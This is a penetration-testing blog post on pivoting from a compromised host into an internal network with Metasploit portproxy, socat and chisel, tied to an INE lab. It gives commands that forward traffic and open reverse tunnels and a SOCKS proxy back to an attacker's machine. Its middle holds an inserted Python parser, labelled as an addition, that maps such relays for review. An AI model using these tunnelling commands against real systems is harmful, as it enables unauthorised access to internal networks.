Metasploit: Portproxy (tunneling a meterpreter session inside another meterpreter session) + socat + chisel

n00🔑
3 min read · Apr 24, 2021

Hi readers, here we will see how we can get a reverse meterpreter shell from an internal machine (one which is not connected to the internet). For better understanding, this article can be followed after reading the previous article (https://pswalia2u.medium.com/pivoting-metasploit-proxychains-85d18ce5bf2d).

Prerequisites:

An already compromised system (the pivot) with a meterpreter session, and autoroute already configured for the next machine (10.100.11.100).

Network architecture:

1. Setting up the portproxy module:

2. Exploiting a vulnerability and configuring the exploit module:

Here we have exploited an Apache Tomcat server (payload uploaded via the Tomcat manager) running on port 8443 on our target (10.100.11.100).

3. Networking info for better understanding:

a. Attacker:

b. Pivot Machine:

c. Target:

Note: the portproxy module is only for Windows pivot machines. For Unix/Linux I prefer socat for forwarding TCP traffic to a specific IP (socat must be installed on the pivot for this to work).

socat TCP-LISTEN:8888,fork TCP:172.16.40.9:8889

Here any TCP traffic we receive on 0.0.0.0:8888 will be forwarded to 172.16.40.9 on port 8889.

A similar thing can be done using chisel (the chisel binary needs to be transferred to the pivot):

CHISEL(https://github.com/jpillora/chisel):

Port forwarding-

1. On the local attacker's Kali box (10.10.14.23) we start the chisel server listening on port 8888.

./chisel server -p 8888 --reverse

2. On the machine where we need to do the forwarding (172.17.0.6) we start the chisel client, specifying the server (10.10.14.23:8888) and the remote machine (172.17.0.4:3000) to which we need to forward traffic.

./chisel client 10.10.14.23:8888 R:3000:172.17.0.4:3000

On the server side we can check that the chisel server has started listening on 127.0.0.1:3000.

Our tunnel has been set up successfully. Now any traffic sent to 127.0.0.1:3000 from 10.10.14.23 will be forwarded to 172.17.0.4:3000.

SOCKS Proxy-

1. Start the chisel server on the Kali box:

chisel server -p 1433 --reverse

2. Start the chisel client on the pivot box:

./chisel64 client 192.168.119.156:1433 R:socks

3. Check that the SOCKS server has been created on the Kali box:

Lab details:

INE LAB 19 (Leveraging PowerShell During Exploitation)

Exposing LDAP via chisel:

chisel server -p 8001 --reverse
./chisel64 client 10.10.14.35:8001 R:389:127.0.0.1:389

Exposing RPC port 111 (UDP port forwarding with socat):

Server side:

socat tcp4-listen:5353,reuseaddr,fork UDP:10.254.100.58:111

Client side:

socat udp4-listen:111,reuseaddr,fork tcp:9.42.116.123:5353
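The chisel remotes (R:port:host:port, R:socks) and the socat listen/connect address pairs above each describe one relay: a bind address on one host and a destination the traffic ends up at. Reading those command lines back into that listen-to-target mapping is useful when reviewing a pivot host or a process listing, so here is an added example (not part of the original article or of the chisel/socat projects) that parses the commands quoted in this post; the default bind host of 0.0.0.0 for chisel remotes and the "pivot"/"client"/"server" labels are assumptions of this example.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Forward:
    tool: str     # "socat" or "chisel"
    proto: str    # "tcp", "udp", "udp->tcp" ... or "socks"
    listen: str   # "<owner> <bind-host>:<port>" the relay accepts on
    target: str   # host:port it connects to ("dynamic" for SOCKS)

def parse_socat(cmd):
    """'socat <p>-listen:<port>,... <p>:<host>:<port>' -> Forward, else None."""
    m = re.search(r"\b(tcp|udp)4?-listen:(\d+)\S*\s+(tcp|udp)4?:([\w.\-]+:\d+)", cmd, re.I)
    if not m:
        return None
    lp, lport, tp, target = (g.lower() for g in m.groups())
    return Forward("socat", lp if lp == tp else f"{lp}->{tp}", f"pivot 0.0.0.0:{lport}", target)

def parse_chisel_client(cmd):
    """'chisel client <server> <remote>...' -> Forwards; an 'R:' remote listens on the server."""
    m = re.search(r"chisel\S*\s+client\s+(\S+)\s+(.+)", cmd)
    if not m:
        return []
    server, found = m.group(1).split(":")[0], []
    for remote in m.group(2).split():
        reverse = remote.startswith("R:")
        side = f"server {server}" if reverse else "client"
        spec = remote[2:] if reverse else remote
        proto = "udp" if spec.endswith("/udp") else "tcp"
        parts = spec.removesuffix("/udp").split(":")
        if parts == ["socks"]:  # dynamic forward on chisel's default SOCKS port
            found.append(Forward("chisel", "socks", f"{side} 0.0.0.0:1080", "dynamic"))
        elif len(parts) in (3, 4):  # [bind-host:]port:host:port, bind-host assumed 0.0.0.0
            lhost, lport, rhost, rport = (["0.0.0.0"] + parts)[-4:]
            found.append(Forward("chisel", proto, f"{side} {lhost}:{lport}", f"{rhost}:{rport}"))
    return found

def forwarding_map(cmdlines):
    """Every socat/chisel relay found in a list of process command lines."""
    found = []
    for line in cmdlines:
        found += parse_chisel_client(line) if "chisel" in line else [f for f in [parse_socat(line)] if f]
    return found

SAMPLE = [  # constructed process listing, built from the commands quoted in this article
    "socat TCP-LISTEN:8888,fork TCP:172.16.40.9:8889",
    "./chisel client 10.10.14.23:8888 R:3000:172.17.0.4:3000",
    "./chisel64 client 192.168.119.156:1433 R:socks",
    "socat udp4-listen:111,reuseaddr,fork tcp:9.42.116.123:5353",
]
```

Running forwarding_map(SAMPLE) yields one Forward per relay, which makes the UDP-over-TCP socat pair and the reverse chisel listeners visible at a glance.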

Thanks for reading!

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)
